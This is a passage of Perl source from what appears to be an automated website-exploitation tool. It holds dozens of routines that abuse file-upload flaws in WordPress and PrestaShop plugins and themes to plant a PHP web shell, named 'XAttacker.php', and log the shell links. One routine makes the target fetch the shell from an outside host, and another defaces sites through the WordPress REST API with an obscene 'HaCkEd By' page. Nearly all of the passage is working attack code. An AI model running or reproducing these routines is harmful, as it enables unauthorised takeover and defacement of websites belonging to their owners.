1029 | print TEXT "$adsup\n";
1030 | close (TEXT);
1031 | }else{
1032 | print color('bold red'),"[";
1033 | print color('bold green'),"+";
1034 | print color('bold red'),"] ";
1035 | print color('bold white'),"Simple Ads Manager";
1036 | print color('bold white')," ................ ";
1037 | print color('bold red'),"NOt VULN\n";
1038 | }
1039 | }
1040 | 
1041 | ################ Slide Show Pro #####################
1042 | sub slideshowpro(){ 
1043 | my $url = "$site/wp-admin/admin.php?page=slideshowpro_manage";
1044 | 
1045 | my $slideshowres = $ua->post($url, Content_Type => 'multipart/form-data', Content => [album_img => ["XAttacker.php"], task => 'pro_add_new_album', album_name => '', album_desc => '',]);
1046 | 
1047 | if ($slideshowres->content =~ /\/uploads\/slideshowpro\/(.*?)\/big\/XAttacker.php/) {
1048 | $uploadfolder=$1;
1049 | $sspup="$site/wp-content/uploads/slideshowpro/$uploadfolder/big/XAttacker.php?X=Attacker";
1050 | 
1051 | print color('bold red'),"[";
1052 | print color('bold green'),"+";
1053 | print color('bold red'),"] ";
1054 | print color('bold white'),"Slide Show Pro";
1055 | print color('bold white')," .................... ";
1056 | print color('bold green'),"VULN\n";
1057 | print color('bold green')," [";
1058 | print color('bold red'),"+";
1059 | print color('bold green'),"] ";
1060 | print color('bold white'),"Shell Uploaded Successfully\n";
1061 | print color('bold white'),"  [Link] => $sspup\n";
1062 | open (TEXT, '>>Result/Shells.txt');
1063 | print TEXT "$sspup\n";
1064 | close (TEXT);
1065 | }else{
1066 | print color('bold red'),"[";
1067 | print color('bold green'),"+";
1068 | print color('bold red'),"] ";
1069 | print color('bold white'),"Slide Show Pro";
1070 | print color('bold white')," .................... ";
1071 | print color('bold red'),"NOt VULN\n";
1072 | }
1073 | }
1074 | 
1075 | ################################## WP Mobile Detector ########################################
1076 | ##############################################################################################
1077 | # check the link of the shell or you can upload "wpmobiledetectorshell.zip" on you one shell #
1078 | ##############################################################################################
1079 | sub wpmobiledetector(){ 
1080 | $wpmdshell = "http://testatranslations.com/shell/XAttacker.php";
1081 | $url = "$site/wp-content/plugins/wp-mobile-detector/resize.php?src=$wpmdshell";
1082 | $wpmdup="$site/wp-content/plugins/wp-mobile-detector/cache/XAttacker.php?X=Attacker";
1083 | 
1084 | my $check = $ua->get("$url"); 
1085 | 
1086 | my $checkup = $ua->get("$wpmdup")->content; 
1087 | if($checkup =~/X Attacker/) {
1088 | print color('bold red'),"[";
1089 | print color('bold green'),"+";
1090 | print color('bold red'),"] ";
1091 | print color('bold white'),"WP Mobile Detector";
1092 | print color('bold white')," ................ ";
1093 | print color('bold green'),"VULN\n";
1094 | print color('bold green')," [";
1095 | print color('bold red'),"+";
1096 | print color('bold green'),"] ";
1097 | print color('bold white'),"Shell Uploaded Successfully\n";
1098 | print color('bold white'),"  [Link] => $wpmdup\n";
1099 | open (TEXT, '>>Result/Shells.txt');
1100 | print TEXT "$wpmdup\n";
1101 | close (TEXT);
1102 | }else{
1103 | print color('bold red'),"[";
1104 | print color('bold green'),"+";
1105 | print color('bold red'),"] ";
1106 | print color('bold white'),"WP Mobile Detector";
1107 | print color('bold white')," ................ ";
1108 | print color('bold red'),"NOt VULN\n";
1109 | }
1110 | }
1111 | 
1112 | ################ WYSIJA #####################
1113 | sub wysija(){
1114 | $theme = "my-theme";
1115 | my $url = "$site/wp-admin/admin-post.php?page=wysija_campaigns&action=themes";
1116 | my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
1117 | $ua->timeout(10);
1118 | $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
1119 | 
1120 | 
1121 | my $wysijares = $ua->post("$url", Content_Type => 'form-data', Content => [ $theme => ['XAttacker.zip', => 'XAttacker.zip'], overwriteexistingtheme => "on",action => "themeupload", submitter => "Upload",]);
1122 | $wysijaup = "$site/wp-content/uploads/wysija/themes/XAttacker/XAttacker.php?X=Attacker";
1123 | my $checkwysija = $ua->get("$wysijaup")->content;
1124 | if($checkwysija =~/X Attacker/) {
1125 | print color('bold red'),"[";
1126 | print color('bold green'),"+";
1127 | print color('bold red'),"] ";
1128 | print color('bold white'),"Wysija";
1129 | print color('bold white')," ............................ ";
1130 | print color('bold green'),"VULN\n";
1131 | print color('bold green')," [";
1132 | print color('bold red'),"+";
1133 | print color('bold green'),"] ";
1134 | print color('bold white'),"Shell Uploaded Successfully\n";
1135 | print color('bold white'),"  [Link] => $wysijaup\n";
1136 | open (TEXT, '>>Result/Shells.txt');
1137 | print TEXT "$wysijaup\n";
1138 | close (TEXT);
1139 | }else{
1140 | print color('bold red'),"[";
1141 | print color('bold green'),"+";
1142 | print color('bold red'),"] ";
1143 | print color('bold white'),"Wysija";
1144 | print color('bold white')," ............................ ";
1145 | print color('bold red'),"NOt VULN\n";
1146 | }
1147 | }
1148 | 
1149 | ################ InBoundio Marketing #####################
1150 | sub inboundiomarketing(){ 
1151 | my $url = "$site/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php";
1152 | $inbomarketingup = "$site/wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/XAttacker.php?X=Attacker";
1153 | my $inbomarketingres = $ua->post($url, Content_Type => 'multipart/form-data', Content => [file => ["XAttacker.php"],]);
1154 | 
1155 | $checkinbomarketing = $ua->get("$inbomarketingup")->content;
1156 | if($checkinbomarketing =~/X Attacker/) {
1157 | 
1158 | print color('bold red'),"[";
1159 | print color('bold green'),"+";
1160 | print color('bold red'),"] ";
1161 | print color('bold white'),"InBoundio Marketing";
1162 | print color('bold white')," ............... ";
1163 | print color('bold green'),"VULN\n";
1164 | print color('bold green')," [";
1165 | print color('bold red'),"+";
1166 | print color('bold green'),"] ";
1167 | print color('bold white'),"Shell Uploaded Successfully\n";
1168 | print color('bold white'),"  [Link] => $inbomarketingup\n";
1169 | open (TEXT, '>>Result/Shells.txt');
1170 | print TEXT "$inbomarketingup\n";
1171 | close (TEXT);
1172 | }else{
1173 | print color('bold red'),"[";
1174 | print color('bold green'),"+";
1175 | print color('bold red'),"] ";
1176 | print color('bold white'),"InBoundio Marketing";
1177 | print color('bold white')," ............... ";
1178 | print color('bold red'),"NOt VULN\n";
1179 | }
1180 | }
1181 | 
1182 | 
1183 | ################ dzs-zoomsounds #####################
1184 | sub dzszoomsounds(){ 
1185 | my $url = "$site/wp-content/plugins/dzs-zoomsounds/admin/upload.php";
1186 | $dzsup = "$site/wp-content/plugins/dzs-zoomsounds/admin/upload/XAttacker.php?X=Attacker";
1187 | my $dzsres = $ua->post($url, Content_Type => 'multipart/form-data', Content => [file_field => ["XAttacker.php"],]);
1188 | 
1189 | $checkdzsup = $ua->get("$dzsup")->content;
1190 | if($checkdzsup =~/X Attacker/) {
1191 | 
1192 | print color('bold red'),"[";
1193 | print color('bold green'),"+";
1194 | print color('bold red'),"] ";
1195 | print color('bold white'),"dzs-zoomsounds";
1196 | print color('bold white')," .................... ";
1197 | print color('bold green'),"VULN\n";
1198 | print color('bold green')," [";
1199 | print color('bold red'),"+";
1200 | print color('bold green'),"] ";
1201 | print color('bold white'),"Shell Uploaded Successfully\n";
1202 | print color('bold white'),"  [Link] => $dzsup\n";
1203 | open (TEXT, '>>Result/Shells.txt');
1204 | print TEXT "$dzsup\n";
1205 | close (TEXT);
1206 | }else{
1207 | print color('bold red'),"[";
1208 | print color('bold green'),"+";
1209 | print color('bold red'),"] ";
1210 | print color('bold white'),"dzs-zoomsounds";
1211 | print color('bold white')," .................... ";
1212 | print color('bold red'),"NOt VULN\n";
1213 | }
1214 | }
1215 | 
1216 | ################ reflex-gallery #####################/
1217 | sub reflexgallery(){ 
1218 | my $url = "$site/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=$year&Month=$month";
1219 | $reflexup = "$site/wp-content/uploads/$year/$month/XAttacker.php?X=Attacker";
1220 | my $reflexres = $ua->post($url, Content_Type => 'multipart/form-data', Content => [qqfile => ["XAttacker.php"],]);
1221 | 
1222 | $checkreflexup = $ua->get("$reflexup")->content;
1223 | if($checkreflexup =~/X Attacker/) {
1224 | print color('bold red'),"[";
1225 | print color('bold green'),"+";
1226 | print color('bold red'),"] ";
1227 | print color('bold white'),"Reflex Gallery";
1228 | print color('bold white')," .................... ";
1229 | print color('bold green'),"VULN\n";
1230 | print color('bold green')," [";
1231 | print color('bold red'),"+";
1232 | print color('bold green'),"] ";
1233 | print color('bold white'),"Shell Uploaded Successfully\n";
1234 | print color('bold white'),"  [Link] => $reflexup\n";
1235 | open (TEXT, '>>Result/Shells.txt');
1236 | print TEXT "$reflexup\n";
1237 | close (TEXT);
1238 | }else{
1239 | print color('bold red'),"[";
1240 | print color('bold green'),"+";
1241 | print color('bold red'),"] ";
1242 | print color('bold white'),"Reflex Gallery";
1243 | print color('bold white')," .................... ";
1244 | print color('bold red'),"NOt VULN\n";
1245 | }
1246 | }
1247 | 
1248 | 
1249 | ################ Creative Contact Form #####################
1250 | sub sexycontactform(){ 
1251 | my $url = "$site/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php";
1252 | $sexycontactup = "$site/wp-content/plugins/sexy-contact-form/includes/fileupload/files/XAttacker.php?X=Attacker";
1253 | my $field_name = "files[]";
1254 | 
1255 | my $sexycontactres = $ua->post( $url,
1256 |             Content_Type => 'form-data',
1257 |             Content => [ $field_name => ["XAttacker.php"] ]
1258 |            
1259 |             );
1260 | 
1261 | $checksexycontactup = $ua->get("$sexycontactup")->content;
1262 | if($checksexycontactup =~/X Attacker/) {
1263 | print color('bold red'),"[";
1264 | print color('bold green'),"+";
1265 | print color('bold red'),"] ";
1266 | print color('bold white'),"Creative Contact Form";
1267 | print color('bold white')," ............. ";
1268 | print color('bold green'),"VULN\n";
1269 | print color('bold green')," [";
1270 | print color('bold red'),"+";
1271 | print color('bold green'),"] ";
1272 | print color('bold white'),"Shell Uploaded Successfully\n";
1273 | print color('bold white'),"  [Link] => $sexycontactup\n";
1274 | open (TEXT, '>>Result/Shells.txt');
1275 | print TEXT "$sexycontactup\n";
1276 | close (TEXT);
1277 | }else{
1278 | print color('bold red'),"[";
1279 | print color('bold green'),"+";
1280 | print color('bold red'),"] ";
1281 | print color('bold white'),"Creative Contact Form";
1282 | print color('bold white')," ............. ";
1283 | print color('bold red'),"NOt VULN\n";
1284 | }
1285 | }
1286 | 
1287 | ################ Work The Flow File Upload #####################
1288 | sub wtffu(){
1289 | my $url = "$site/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/";
1290 | my $shell ="XAttacker.php";
1291 | my $field_name = "files[]";
1292 | 
1293 | my $response = $ua->post($url, Content_Type => 'multipart/form-data', content => [ $field_name => [$shell]]);
1294 | $wtffup="$site/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/XAttacker.php?X=Attacker";
1295 | 
1296 | $checkwtffup = $ua->get("$wtffup")->content;
1297 | if($checkwtffup =~/X Attacker/) {
1298 | print color('bold red'),"[";
1299 | print color('bold green'),"+";
1300 | print color('bold red'),"] ";
1301 | print color('bold white'),"Work The Flow File Upload";
1302 | print color('bold white')," ......... ";
1303 | print color('bold green'),"VULN\n";
1304 | print color('bold green')," [";
1305 | print color('bold red'),"+";
1306 | print color('bold green'),"] ";
1307 | print color('bold white'),"Shell Uploaded Successfully\n";
1308 | print color('bold white'),"  [Link] => $wtffup\n";
1309 | open (TEXT, '>>Result/Shells.txt');
1310 | print TEXT "$wtffup\n";
1311 | close (TEXT);
1312 | }else{
1313 | print color('bold red'),"[";
1314 | print color('bold green'),"+";
1315 | print color('bold red'),"] ";
1316 | print color('bold white'),"Work The Flow File Upload";
1317 | print color('bold white')," ......... ";
1318 | print color('bold red'),"NOt VULN\n";
1319 | }
1320 | }
1321 | 
1322 | ################ WP Job Manger #####################
1323 | sub wpjm(){
1324 | my $url = "$site/jm-ajax/upload_file/";
1325 | my $image ="XAttacker.php";
1326 | my $field_name = "file[]";
1327 | 
1328 | my $response = $ua->post( $url,
1329 |             Content_Type => 'form-data',
1330 |             Content => [ $field_name => ["$image"] ]
1331 |            
1332 |             );
1333 | 
1334 | $jobmangerup = "$site/wp-content/uploads/job-manager-uploads/file/$year/$month/XAttacker.gif";
1335 | $checkpofwup = $ua->get("$jobmangerup")->content_type;
1336 | if($checkpofwup =~/image\/gif/) {
1337 | print color('bold red'),"[";
1338 | print color('bold green'),"+";
1339 | print color('bold red'),"] ";
1340 | print color('bold white'),"WP Job Manger";
1341 | print color('bold white')," ..................... ";
1342 | print color('bold green'),"VULN\n";
1343 | print color('bold green')," [";
1344 | print color('bold red'),"+";
1345 | print color('bold green'),"] ";
1346 | print color('bold white'),"Picture Uploaded Successfully\n";
1347 | print color('bold white'),"  [Link] => $jobmangerup\n";
1348 | print color('bold green'),"  [";
1349 | print color('bold red'),"-";
1350 | print color('bold green'),"] ";
1351 | open (TEXT, '>>Result/index.txt');
1352 | print TEXT "$jobmangerup\n";
1353 | close (TEXT);
1354 | }else{
1355 | print color('bold red'),"[";
1356 | print color('bold green'),"+";
1357 | print color('bold red'),"] ";
1358 | print color('bold white'),"WP Job Manger";
1359 | print color('bold white')," ..................... ";
1360 | print color('bold red'),"NOt VULN\n";
1361 | }
1362 | }
1363 | 
1364 | ################  PHP Event Calendar #####################
1365 | sub phpeventcalendar(){
1366 | my $url = "$site/wp-content/plugins/php-event-calendar/server/file-uploader/";
1367 | my $shell ="XAttacker.php";
1368 | my $field_name = "files[]";
1369 | 
1370 | my $response = $ua->post($url, Content_Type => 'multipart/form-data', content => [ $field_name => [$shell]]);
1371 | $phpevup="$site/wp-content/plugins/php-event-calendar/server/file-uploader/XAttacker.php?X=Attacker";
1372 | 
1373 | if ($response->content =~ /{"files/) {
1374 | print color('bold red'),"[";
1375 | print color('bold green'),"+";
1376 | print color('bold red'),"] ";
1377 | print color('bold white'),"PHP Event Calendar";
1378 | print color('bold white')," ................ ";
1379 | print color('bold green'),"VULN\n";
1380 | print color('bold green')," [";
1381 | print color('bold red'),"+";
1382 | print color('bold green'),"] ";
1383 | print color('bold white'),"Shell Uploaded Successfully\n";
1384 | print color('bold white'),"  [Link] => $phpevup\n";
1385 | open (TEXT, '>>Result/Shells.txt');
1386 | print TEXT "$phpevup\n";
1387 | close (TEXT);
1388 | }else{
1389 | print color('bold red'),"[";
1390 | print color('bold green'),"+";
1391 | print color('bold red'),"] ";
1392 | print color('bold white'),"PHP Event Calendar";
1393 | print color('bold white')," ................ ";
1394 | print color('bold red'),"NOt VULN\n";
1395 | }
1396 | }
1397 | 
1398 | ################ Synoptic #####################
1399 | sub synoptic(){
1400 | my $url = "$site/wp-content/themes/synoptic/lib/avatarupload/upload.php";
1401 | my $shell ="XAttacker.php";
1402 | my $field_name = "qqfile";
1403 | 
1404 | my $response = $ua->post($url, Content_Type => 'multipart/form-data', content => [ $field_name => [$shell]]);
1405 | $Synopticup="$site/wp-content/uploads/markets/avatars/XAttacker.php?X=Attacker";
1406 | 
1407 | $checkSynopticup = $ua->get("$Synopticup")->content;
1408 | if($checkSynopticup =~/X Attacker/) {
1409 | print color('bold red'),"[";
1410 | print color('bold green'),"+";
1411 | print color('bold red'),"] ";
1412 | print color('bold white'),"Synoptic";
1413 | print color('bold white')," .......................... ";
1414 | print color('bold green'),"VULN\n";
1415 | print color('bold green')," [";
1416 | print color('bold red'),"+";
1417 | print color('bold green'),"] ";
1418 | print color('bold white'),"Shell Uploaded Successfully\n";
1419 | print color('bold white'),"  [Link] => $Synopticup\n";
1420 | open (TEXT, '>>Result/Shells.txt');
1421 | print TEXT "$Synopticup\n";
1422 | close (TEXT);
1423 | }else{
1424 | print color('bold red'),"[";
1425 | print color('bold green'),"+";
1426 | print color('bold red'),"] ";
1427 | print color('bold white'),"Synoptic";
1428 | print color('bold white')," .......................... ";
1429 | print color('bold red'),"NOt VULN\n";
1430 | }
1431 | }
1432 | 
1433 | ################ Wpshop #####################
1434 | sub Wpshop(){
1435 | my $url = "$site/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload";
1436 | my $shell ="XAttacker.php";
1437 | my $field_name = "wpshop_file";
1438 | 
1439 | my $response = $ua->post($url, Content_Type => 'multipart/form-data', content => [ $field_name => [$shell]]);
1440 | $wpshopup="$site/wp-content/uploads/XAttacker.php?X=Attacker";
1441 | 
1442 | $checkwpshopup = $ua->get("$wpshopup")->content;
1443 | if($checkwpshopup =~/X Attacker/) {
1444 | 
1445 | print color('bold red'),"[";
1446 | print color('bold green'),"+";
1447 | print color('bold red'),"] ";
1448 | print color('bold white'),"Wp Shop";
1449 | print color('bold white')," ........................... ";
1450 | print color('bold green'),"VULN\n";
1451 | print color('bold green')," [";
1452 | print color('bold red'),"+";
1453 | print color('bold green'),"] ";
1454 | print color('bold white'),"Shell Uploaded Successfully\n";
1455 | print color('bold white'),"  [Link] => $wpshopup\n";
1456 | open (TEXT, '>>Result/Shells.txt');
1457 | print TEXT "$wpshopup\n";
1458 | close (TEXT);
1459 | }else{
1460 | print color('bold red'),"[";
1461 | print color('bold green'),"+";
1462 | print color('bold red'),"] ";
1463 | print color('bold white'),"Wp Shop";
1464 | print color('bold white')," ........................... ";
1465 | print color('bold red'),"NOt VULN\n";
1466 | }
1467 | }
1468 | # this exploit Content Injection coded by fallag gassrini <3
1469 | ################ Content Injection #####################
1470 | sub wpinjection(){
1471 | $linkposts = $site . 'index.php/wp-json/wp/v2/posts/';
1472 | 
1473 | $sorm = $ua->get($linkposts);
1474 | $karza = $sorm->content;
1475 | if($karza =~/\/?p=(.*?)\"\}/)
1476 | {
1477 | $id=$1;
1478 | 
1479 | $ajx = $site . '/wp-json/wp/v2/posts/'.$id;
1480 | 
1481 | $sirina=$id . 'justrawdata';
1482 | $index='<p align="center"><img border="0" src="http://vignette4.wikia.nocookie.net/trollpasta/images/3/34/Fuck-you-cartoon-meme.gif" width="339" height="476"></p><pre>&nbsp;</pre><div align="center"><p align="center" class="auto-style2">
1483 |     <font face="Bradley Hand ITC" size="6">HaCkEd By Mohamed Riahi</font></p>
1484 |     <p align="center" class="auto-style2">';
1485 | $gassface = POST $ajx, [
1486 | 'id' => $sirina, 'slug' => '/m.htm', 'title' => 'HaCkEd By Mohamed Riahi ', 'content' => $index];
1487 | $response = $ua->request($gassface);
1488 | $stat = $response->content;
1489 |     if ($stat =~ /HaCkEd/){
1490 | $urljson = "$site/m.htm";
1491 | $link = $ua->get($site);
1492 | $link = $link->request->uri;
1493 | print color('bold red'),"[";
1494 | print color('bold green'),"+";
1495 | print color('bold red'),"] ";
1496 | print color('bold white'),"Content Injection";
1497 | print color('bold white')," ................. ";
1498 | print color('bold green'),"VULN\n";
1499 | print color('bold green')," [";
1500 | print color('bold red'),"+";
1501 | print color('bold green'),"] ";
1502 | print color('bold white'),"Injected Successfully\n";
1503 | print color('bold white'),"  [Link] => $urljson\n";
1504 | open (TEXT, '>>Result/index.txt');
1505 | print TEXT "$urljson\n";
1506 | close (TEXT);
1507 | }else{
1508 | print color('bold red'),"[";
1509 | print color('bold green'),"+";
1510 | print color('bold red'),"] ";
1511 | print color('bold white'),"Content Injection";
1512 | print color('bold white')," ................. ";
1513 | print color('bold red'),"NOt VULN\n";
1514 | }
1515 | }
1516 | }
1517 | 
1518 | 
1519 | 
1520 | ######################################################
1521 | #################### PrestaShoP ######################
1522 | ######################################################
1523 | 
1524 | ################ columnadverts #####################
1525 | sub columnadverts(){
1526 | my $url = "$site/modules/columnadverts/uploadimage.php";
1527 | my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["XAttacker.php"],]);
1528 | 
1529 | $columnadvertsup="$site/modules/columnadverts/slides/XAttacker.php?X=Attacker";
1530 | 
1531 | my $checkcolumnadverts = $ua->get("$columnadvertsup")->content;
1532 | if($checkcolumnadverts =~/X Attacker/) {
1533 | 
1534 | print color('bold red'),"[";
1535 | print color('bold green'),"+";
1536 | print color('bold red'),"] ";
1537 | print color('bold white'),"columnadverts";
1538 | print color('bold white')," ..................... ";
1539 | print color('bold green'),"VULN\n";
1540 | print color('bold green')," [";
1541 | print color('bold red'),"+";
1542 | print color('bold green'),"] ";
1543 | print color('bold white'),"Shell Uploaded Successfully\n";
1544 | print color('bold white'),"  [Link] => $columnadvertsup\n";
1545 | open (TEXT, '>>Result/Shells.txt');
1546 | print TEXT "$columnadvertsup\n";
1547 | close (TEXT);
1548 | }else{
1549 | print color('bold red'),"[";
1550 | print color('bold green'),"+";
1551 | print color('bold red'),"] ";
1552 | print color('bold white'),"columnadverts";
1553 | print color('bold white')," ..................... ";
1554 | print color('bold red'),"NOt VULN\n";
1555 | }
1556 | }
1557 | 
1558 | 
1559 | ################ soopamobile #####################
1560 | sub soopamobile(){
1561 | my $url = "$site/modules/soopamobile/uploadimage.php";
1562 | my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["XAttacker.php"],]);
1563 | 
1564 | $soopamobileup="$site/modules/soopamobile/slides/XAttacker.php?X=Attacker";
1565 | 
1566 | my $checksoopamobile = $ua->get("$soopamobileup")->content;
1567 | if($checksoopamobile =~/X Attacker/) {
1568 | print color('bold red'),"[";
1569 | print color('bold green'),"+";
1570 | print color('bold red'),"] ";
1571 | print color('bold white'),"soopamobile";
1572 | print color('bold white')," ....................... ";
1573 | print color('bold green'),"VULN\n";
1574 | print color('bold green')," [";
1575 | print color('bold red'),"+";
1576 | print color('bold green'),"] ";
1577 | print color('bold white'),"Shell Uploaded Successfully\n";
1578 | print color('bold white'),"  [Link] => $soopamobileup\n";
1579 | open (TEXT, '>>Result/Shells.txt');
1580 | print TEXT "$soopamobileup\n";
1581 | close (TEXT);
1582 | }else{
1583 | print color('bold red'),"[";
1584 | print color('bold green'),"+";
1585 | print color('bold red'),"] ";
1586 | print color('bold white'),"soopamobile";
1587 | print color('bold white')," ....................... ";
1588 | print color('bold red'),"NOt VULN\n";
1589 | }
1590 | }
1591 | 
1592 | ################ soopabanners #####################
1593 | sub soopabanners(){
1594 | my $url = "$site/modules/soopabanners/uploadimage.php";
1595 | my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["XAttacker.php"],]);
1596 | 
1597 | $soopabannersup="$site/modules/soopabanners/slides/XAttacker.php?X=Attacker";
1598 | 
1599 | my $checksoopabanners = $ua->get("$soopabannersup")->content;
1600 | if($checksoopabanners =~/X Attacker/) {
1601 | 
1602 | print color('bold red'),"[";
1603 | print color('bold green'),"+";
1604 | print color('bold red'),"] ";
1605 | print color('bold white'),"soopabanners";
1606 | print color('bold white')," ...................... ";
1607 | print color('bold green'),"VULN\n";
1608 | print color('bold green')," [";
1609 | print color('bold red'),"+";
1610 | print color('bold green'),"] ";
1611 | print color('bold white'),"Shell Uploaded Successfully\n";
1612 | print color('bold white'),"  [Link] => $soopabannersup\n";
1613 | open (TEXT, '>>Result/Shells.txt');
1614 | print TEXT "$soopabannersup\n";
1615 | close (TEXT);
1616 | }else{
1617 | print color('bold red'),"[";
1618 | print color('bold green'),"+";
1619 | print color('bold red'),"] ";
1620 | print color('bold white'),"soopabanners";
1621 | print color('bold white')," ...................... ";
1622 | print color('bold red'),"NOt VULN\n";
1623 | }
1624 | }
1625 | 
1626 | ################ vtermslideshow #####################
1627 | sub vtermslideshow(){
1628 | my $url = "$site/modules/vtermslideshow/uploadimage.php";
1629 | my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["XAttacker.php"],]);
1630 | 
1631 | $vtermslideshowup="$site/modules/vtermslideshow/slides/XAttacker.php?X=Attacker";
1632 | 
1633 | my $checkvtermslideshow = $ua->get("$vtermslideshowup")->content;
1634 | if($checkvtermslideshow =~/X Attacker/) {
1635 | 
1636 | print color('bold red'),"[";
1637 | print color('bold green'),"+";
1638 | print color('bold red'),"] ";
1639 | print color('bold white'),"Vtermslideshow";
1640 | print color('bold white')," .................... ";
1641 | print color('bold green'),"VULN\n";
1642 | print color('bold green')," [";
1643 | print color('bold red'),"+";
1644 | print color('bold green'),"] ";
1645 | print color('bold white'),"Shell Uploaded Successfully\n";
1646 | print color('bold white'),"  [Link] => $vtermslideshowup\n";
1647 | open (TEXT, '>>Result/Shells.txt');
1648 | print TEXT "$vtermslideshowup\n";
1649 | close (TEXT);
1650 | }else{
1651 | print color('bold red'),"[";
1652 | print color('bold green'),"+";
1653 | print color('bold red'),"] ";
1654 | print color('bold white'),"Vtermslideshow";
1655 | print color('bold white')," .................... ";
1656 | print color('bold red'),"NOt VULN\n";
1657 | }
1658 | }
1659 | 
1660 | ################ simpleslideshow #####################
1661 | sub simpleslideshow(){
1662 | my $url = "$site/modules/simpleslideshow/uploadimage.php";
1663 | my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["XAttacker.php"],]);
1664 | 
1665 | $simpleslideshowup="$site/modules/simpleslideshow/slides/XAttacker.php?X=Attacker";
1666 | 
1667 | my $checksimpleslideshow = $ua->get("$simpleslideshowup")->content;
1668 | if($checksimpleslideshow =~/X Attacker/) {
1669 | 
1670 | print color('bold red'),"[";
1671 | print color('bold green'),"+";
1672 | print color('bold red'),"] ";
1673 | print color('bold white'),"simpleslideshow";
1674 | print color('bold white')," ................... ";
1675 | print color('bold green'),"VULN\n";
1676 | print color('bold green')," [";
1677 | print color('bold red'),"+";
1678 | print color('bold green'),"] ";
1679 | print color('bold white'),"Shell Uploaded Successfully\n";
1680 | print color('bold white'),"  [Link] => $simpleslideshowup\n";
1681 | open (TEXT, '>>Result/Shells.txt');
1682 | print TEXT "$simpleslideshowup\n";
1683 | close (TEXT);
1684 | }else{
1685 | print color('bold red'),"[";
1686 | print color('bold green'),"+";
1687 | print color('bold red'),"] ";
1688 | print color('bold white'),"simpleslideshow";
1689 | print color('bold white')," ................... ";
1690 | print color('bold red'),"NOt VULN\n";
1691 | }
1692 | }
1693 | 
1694 | ################ productpageadverts #####################
1695 | sub productpageadverts(){
1696 | my $url = "$site/modules/productpageadverts/uploadimage.php";
1697 | my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["XAttacker.php"],]);
1698 | 
1699 | $productpageadvertsup="$site/modules/productpageadverts/slides/XAttacker.php?X=Attacker";
1700 | 
1701 | my $checkproductpageadverts = $ua->get("$productpageadvertsup")->content;
1702 | if($checkproductpageadverts =~/X Attacker/) {
1703 | 
1704 | print color('bold red'),"[";
1705 | print color('bold green'),"+";
1706 | print color('bold red'),"] ";
1707 | print color('bold white'),"productpageadverts";
1708 | print color('bold white')," ................ ";
1709 | print color('bold green'),"VULN\n";
1710 | print color('bold green')," [";
1711 | print color('bold red'),"+";
1712 | print color('bold green'),"] ";
1713 | print color('bold white'),"Shell Uploaded Successfully\n";
1714 | print color('bold white'),"  [Link] => $productpageadvertsup\n";
1715 | open (TEXT, '>>Result/Shells.txt');
1716 | print TEXT "$productpageadvertsup\n";
1717 | close (TEXT);
1718 | }else{
1719 | print color('bold red'),"[";
1720 | print color('bold green'),"+";
1721 | print color('bold red'),"] ";
1722 | print color('bold white'),"productpageadverts";
1723 | print color('bold white')," ................ ";
1724 | print color('bold red'),"NOt VULN\n";
1725 | }
1726 | }
1727 | 
1728 | ################ homepageadvertise #####################
1729 | sub homepageadvertise(){
1730 | my $url = "$site/modules/homepageadvertise/uploadimage.php";
1731 | my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["XAttacker.php"],]);
1732 | 
1733 | $homepageadvertiseup="$site/modules/homepageadvertise/slides/XAttacker.php?X=Attacker";
1734 | 
1735 | my $checkhomepageadvertise = $ua->get("$homepageadvertiseup")->content;
1736 | if($checkhomepageadvertise =~/X Attacker/) {
1737 | 
1738 | print color('bold red'),"[";
1739 | print color('bold green'),"+";
1740 | print color('bold red'),"] ";
1741 | print color('bold white'),"homepageadvertise";
1742 | print color('bold white')," ................. ";
1743 | print color('bold green'),"VULN\n";
1744 | print color('bold green')," [";
1745 | print color('bold red'),"+";
1746 | print color('bold green'),"] ";
1747 | print color('bold white'),"Shell Uploaded Successfully\n";
1748 | print color('bold white'),"  [Link] => $homepageadvertiseup\n";
1749 | open (TEXT, '>>Result/Shells.txt');
1750 | print TEXT "$homepageadvertiseup\n";
1751 | close (TEXT);
1752 | }else{
1753 | print color('bold red'),"[";
1754 | print color('bold green'),"+";
1755 | print color('bold red'),"] ";
1756 | print color('bold white'),"homepageadvertise";
1757 | print color('bold white')," ................. ";
1758 | print color('bold red'),"NOt VULN\n";
1759 | }
1760 | }
1761 | 
1762 | ################ homepageadvertise2 #####################
1763 | sub homepageadvertise2(){
1764 | my $url = "$site/modules/homepageadvertise2/uploadimage.php";
1765 | my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["XAttacker.php"],]);
1766 | 
1767 | $homepageadvertise2up="$site/modules/homepageadvertise2/slides/XAttacker.php?X=Attacker";
1768 | 
1769 | my $checkhomepageadvertise2 = $ua->get("$homepageadvertise2up")->content;
1770 | if($checkhomepageadvertise2 =~/X Attacker/) {
1771 | 
1772 | print color('bold red'),"[";
1773 | print color('bold green'),"+";
1774 | print color('bold red'),"] ";
1775 | print color('bold white'),"homepageadvertise2";
1776 | print color('bold white')," ................ ";
1777 | print color('bold green'),"VULN\n";
1778 | print color('bold green')," [";
1779 | print color('bold red'),"+";
1780 | print color('bold green'),"] ";
1781 | print color('bold white'),"Shell Uploaded Successfully\n";
1782 | print color('bold white'),"  [Link] => $homepageadvertise2up\n";
1783 | open (TEXT, '>>Result/Shells.txt');
1784 | print TEXT "$homepageadvertise2up\n";
1785 | close (TEXT);
1786 | }else{
1787 | print color('bold red'),"[";
1788 | print color('bold green'),"+";
1789 | print color('bold red'),"] ";
